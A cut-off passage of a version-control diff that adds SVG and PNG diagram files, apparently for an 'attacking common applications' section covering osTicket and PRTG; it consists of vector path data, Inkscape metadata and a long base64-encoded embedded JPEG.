fill="#f9a541"/> + <path d="m92.6 104.3c-5.7 1.7-12.1.4-16.6-4.1l-.6-.6 7.4-7.4.6.6c2.4 2.4 6.3 2.4 8.7 0s2.4-6.3 0-8.7l-16.6-16.6 7.4-7.4 16.7 16.7c4.2 4.2 5.7 10.2 4.4 15.7 4.9.7 8.6 4.9 8.6 9.9 0 5.5-4.5 10-10 10-5-.1-9.1-3.6-10-8.1z" fill="#f44321"/> + <path d="m89.7 83.5-16.6 16.6c-4.3 4.3-10.3 5.7-15.7 4.4-1 4.5-5 7.8-9.8 7.8-5.5 0-10-4.5-10-10 0-4.7 3.3-8.7 7.7-9.7-1.4-5.6 0-11.6 4.3-15.9l.6-.6 7.4 7.4-.6.6c-2.4 2.4-2.4 6.3 0 8.7s6.3 2.4 8.7 0l16.6-16.6z" fill="#5091cd"/> + </g> +</svg> diff --git a/public/diagrams/attacking-common-applications/osticket.png b/public/diagrams/attacking-common-applications/osticket.png Binary files differ. diff --git a/public/diagrams/attacking-common-applications/prtg.svg b/public/diagrams/attacking-common-applications/prtg.svg @@ -0,0 +1,72 @@ +<?xml version="1.0" encoding="UTF-8" standalone="no"?> +<!-- Created with Inkscape (http://www.inkscape.org/) --> + +<svg + width="166.44621mm" + height="130.29715mm" + viewBox="0 0 166.44621 130.29715" + version="1.1" + id="svg5" + xml:space="preserve" + inkscape:version="1.2.1 (9c6d41e410, 2022-07-14, custom)" + sodipodi:docname="prtg.svg" + xmlns:inkscape="http://www.inkscape.org/namespaces/inkscape" + xmlns:sodipodi="http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtd" + xmlns:xlink="http://www.w3.org/1999/xlink" + xmlns="http://www.w3.org/2000/svg" + xmlns:svg="http://www.w3.org/2000/svg"><sodipodi:namedview + id="namedview7" + pagecolor="#ffffff" + bordercolor="#666666" + borderopacity="1.0" + inkscape:showpageshadow="2" + inkscape:pageopacity="0.0" + inkscape:pagecheckerboard="0" + inkscape:deskcolor="#d1d1d1" + inkscape:document-units="mm" + showgrid="false" + inkscape:zoom="0.35355339" + inkscape:cx="240.4163" + inkscape:cy="94.752308" + inkscape:window-width="1920" + inkscape:window-height="1006" + inkscape:window-x="0" + inkscape:window-y="0" + inkscape:window-maximized="1" + inkscape:current-layer="layer2" /><defs + id="defs2" /><g + inkscape:label="Layer 1" + inkscape:groupmode="layer" + id="layer1" + style="display:none" + transform="translate(-22.812022,-69.167871)"><image + width="317.5" + height="183.44444" + preserveAspectRatio="none" + style="display:inline;fill:#ee0f6a;fill-opacity:1;image-rendering:optimizeQuality" + xlink:href="data:image/jpeg;base64,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 